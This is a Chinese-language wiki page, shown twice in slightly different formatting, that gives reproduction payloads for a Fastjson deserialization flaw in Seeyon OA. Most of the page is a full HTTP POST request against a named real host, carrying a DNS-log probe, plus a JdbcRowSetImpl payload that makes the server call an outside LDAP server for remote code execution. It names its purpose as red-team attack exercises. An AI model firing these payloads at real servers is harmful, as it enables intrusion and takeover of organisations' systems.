fofamini-wiki

登录白背景

源码

致远OA Fastjson反序列化漏洞

漏洞描述

致远OA fastjson反序列化漏洞，请不要恶意利用，留着打HW

漏洞影响

致远OA

漏洞复现

payload：

POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: oa.gzcc.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
Connection: close 
Upgrade-Insecure-Requests: 1 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 75

_json_params={"@type":"java.net.Inet4Address","val":"8j8m76.dnslog.cn"}

Ldap注入：

_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xxx.xxx.xxx:1289/TomcatBypass/TomcatEcho","autoCommit":true}}

# 致远OA Fastjson反序列化漏洞

## 漏洞描述

致远OA fastjson反序列化漏洞，请不要恶意利用，留着打HW

## 漏洞影响

> 致远OA

## 漏洞复现

payload：

```
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: oa.gzcc.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
Connection: close 
Upgrade-Insecure-Requests: 1 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 75

_json_params={"@type":"java.net.Inet4Address","val":"8j8m76.dnslog.cn"}
```

![image-20210822212638632](/resource/致远OA-Fastjson反序列化漏洞/image-20210822212638632.png)

![image-20210822212646088](/resource/致远OA-Fastjson反序列化漏洞/image-20210822212646088.png)

Ldap注入：

```
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xxx.xxx.xxx:1289/TomcatBypass/TomcatEcho","autoCommit":true}}
```